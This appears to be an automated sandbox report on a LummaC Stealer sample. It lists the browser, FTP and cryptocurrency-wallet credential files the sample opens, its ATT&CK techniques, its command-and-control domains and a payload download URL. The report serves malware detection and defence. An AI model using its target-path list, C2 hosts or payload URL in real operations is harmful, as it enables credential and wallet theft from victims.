            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		34
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		1
            Query Registry            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory751
            Security Software Discovery            		Remote Desktop Protocol41
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager34
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets11
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials223
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe100%AviraTR/Crypt.TPM.Gen
            file.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            crisiwarny.store
            		172.67.170.64
            		truetrue
              		unknown
              presticitpo.store
              		unknown
              		unknowntrue
                		unknown
                206.23.85.13.in-addr.arpa
                		unknown
                		unknownfalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  presticitpo.storetrue
                    		unknown
                    https://crisiwarny.store/apitrue
                      		unknown
                      necklacedmny.storetrue
                        		unknown
                        fadehairucw.storetrue
                          		unknown
                          founpiuer.storetrue
                            		unknown
                            crisiwarny.storetrue
                              		unknown
                              scriptyprefej.storetrue
                                		unknown
                                navygenerayk.storetrue
                                  		unknown
                                  thumbystriw.storetrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://crisiwarny.store/gfile.exe, 00000000.00000003.2064902373.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://crisiwarny.store/apigfile.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://185.215.113.16/off/def.exeSfile.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://crisiwarny.store/Jfile.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1712232842.0000000005147000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1712165908.000000000514E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://crisiwarny.store/bfafile.exe, 00000000.00000003.1759143782.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759468384.00000000006FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://crisiwarny.store:443/apifile.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYifile.exe, file.exe, 00000000.00000003.1759077269.0000000000709000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://x1.c.lencr.org/0file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://x1.i.lencr.org/0file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000000.00000003.1712232842.0000000005122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
